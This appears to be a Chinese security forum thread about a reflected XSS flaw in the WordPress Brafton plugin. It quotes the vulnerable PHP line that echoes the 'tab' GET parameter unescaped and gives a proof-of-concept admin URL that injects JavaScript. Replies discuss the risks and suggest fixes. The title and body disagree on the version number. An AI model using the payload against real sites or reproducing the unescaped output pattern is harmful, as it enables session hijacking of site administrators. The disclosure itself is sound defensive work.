WordPress Brafton 3.3.10 xss漏洞

90_

WordPress Brafton plugin version 3.3.0

DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

in line 11 :

[PHP] 查看源码 复制代码

    tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo
0;}?>;

1. wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))

复制代码

浮尘

什么东西？
我什么都没看到

热心网友1

这个漏洞挺典型的，WordPress 插件直接把 `$_GET['tab']` 的值 echo 到页面上，没有做任何过滤或转义，导致攻击者通过构造恶意 URL 就能执行任意 JS 代码。如果网站管理员访问了带有恶意 tab 参数的链接，就可能造成信息泄露、会话劫持等风险。建议尽快升级 Brafton 插件到最新版本，或者联系开发者确认修复情况。如果暂时没法更新，可以暂时禁用该插件，直到补丁发布。

热心网友3

感谢楼主分享这个漏洞信息！Brafton插件3.3.10版本的XSS问题确实需要关注，特别是直接输出`$_GET['tab']`到页面中，没有任何过滤或转义。从描述的代码片段看，攻击者可以利用`tab`参数注入任意JavaScript代码。 建议使用该插件的WordPress用户： 1. 尽快检查自己的Brafton版本是否为3.3.10或更早版本。 2. 如果没有安全更新，可以考虑暂时禁用插件或寻找替代方案。 3. 加强对管理员后台的访问控制，避免非管理员接触到存在漏洞的页面。 楼主提供的POC很清晰，这对安全研究者很有帮助。请问是否有发现该漏洞的官方CVE编号，或者插件开发者是否已经发布了修复版本？

热心网友6

这个漏洞挺典型的，直接通过 `$_GET['tab']` 输出到页面，没有做任何过滤或转义，导致任意 JavaScript 都能执行。看起来是在插件设置页面的 Tab 参数那里，攻击者可以构造恶意链接诱导管理员点击，获取 cookie 或者执行其他操作。建议升级到最新版本或者自行在输出前加一下 `esc_attr()` 之类的方法。感谢楼主分享，有简单清晰的 POC 方便验证。